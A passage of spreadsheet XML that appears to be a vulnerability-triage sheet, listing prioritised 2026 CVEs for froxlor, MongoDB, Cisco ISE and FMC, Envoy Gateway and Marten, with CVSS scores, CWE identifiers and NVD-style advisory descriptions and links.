      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90937</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>froxlor versions before 2.2.5 fail to validate newline characters in subdomain redirect URLs, allowing authenticated customers to inject arbitrary nginx or Apache configuration directives. Attackers can supply URLs containing literal newlines that are written verbatim into vhost config files during cron rebuild, enabling web server configuration corruption, denial of service, or hijacking of HTTP responses across hosted domains.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90937</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20176</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid high-privileged administrative credentials.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain system-level access to the underlying operating system and then elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20176</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20194</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20194 are related to incorrect resource transfer between spheres that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-669.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20194</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20211</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid high-privileged administrative credentials.
This vulnerability is due to insecure deserialization of Java objects by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to&amp;nbsp;root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20211</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20237</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20237 are related to improper input validation issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-20.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20237</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20284</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the SXP REST API of Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks.
This vulnerability is due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit this vulnerability by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the underlying database for the affected device. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.
To exploit this vulnerability, the attacker must have valid administrative credentials, have the SXP service enabled, and have at least one SXP connection configured.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20284</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20305</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the diagnostic tools of Cisco ISE and ISE-PIC could allow an authenticated, remote attacker to perform command injection attacks on the underlying operating system and elevate privileges to&amp;nbsp;root. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20305</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20306</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and ISE-PIC could allow an authenticated, remote attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20306</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20341</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software could allow an authenticated, remote attacker to obtain&amp;nbsp;root privileges.
This vulnerability is due to unsecured deserialization of untrusted data over the sftunnel management connection. An attacker could exploit this vulnerability by sending crafted sftunnel remote procedure calls (RPCs). A successful exploit could allow the attacker to gain root privileges on a device that is running Cisco Secure FMC Software and its high-availability peer.
To exploit this vulnerability, the attacker must have valid administrative credentials on a managed Cisco FTD device.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20341</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53713</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, to_absolute_normalized_path in internal/gatewayapi/luavalidator/security.lua does not collapse redundant separators before is_critical_path evaluates Lua submitted through EnvoyExtensionPolicy during default Strict validation. Linux resolves a double-slash absolute path as the corresponding single-slash path, but the validator does not match the redundant-separator form, allowing submitted Lua to read arbitrary files from the gateway controller pod. Exposed files can include Kubernetes service-account tokens, TLS certificates, and process environment data, and the disclosed credentials can provide access to sensitive Kubernetes API Server or Gateway xDS server information. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53713</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Marten is a .NET Transactional Document DB and Event Store on PostgreSQL. From version 7.0.0 until 9.13.0, several Marten LINQ and tenant-management paths interpolate runtime, potentially attacker-controlled strings into single-quoted SQL literals without escaping or parameterization. The primary confirmed vector is a dictionary indexer key used by Where filters in src/Marten/Linq/Members/Dictionaries/DictionaryItemMember.cs. Additional affected sinks include SelectParser.cs, DatabaseScopedTenantPartitions.cs, and DeleteAllForTenant.cs reached through IEventStore.DeleteProjectionProgressAsync, while DictionaryContainsKeyFilter.cs (Newtonsoft serializer only; System.Text.Json is not affected) handles ContainsKey calls. Events/Daemon/Internals/EventLoader.cs contains a related per-tenant partition-pruning literal that the advisory identifies as a defense-in-depth sink. A crafted single quote can escape the generated literal, enabling filter or multi-tenant authorization bypass and blind data exfiltration, and deployments that permit semicolon-batched Npgsql statements may also allow data modification. This issue is fixed in version 9.13.0.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76420</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the internal configuration of the Apache JServ Protocol (AJP)&amp;nbsp;connector for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to impersonate a peer device.
This vulnerability is due to incorrect initialization of encryption parameters for the AJP connector at boot time. An attacker could exploit this vulnerability by sending crafted packets to the AJP connector. A&amp;nbsp;successful exploit could allow the attacker to execute commands as root and&amp;nbsp;gain full control over the FMC REST APIs on the affected device.
Note: This vulnerability can be exploited only if the valid sftunnel connection between Cisco Secure FMC Software and Cisco Secure FTD Software is down.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76420</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20333</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20333 are related to incorrect comparison conditions that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-697.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20333</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20336</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-664</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
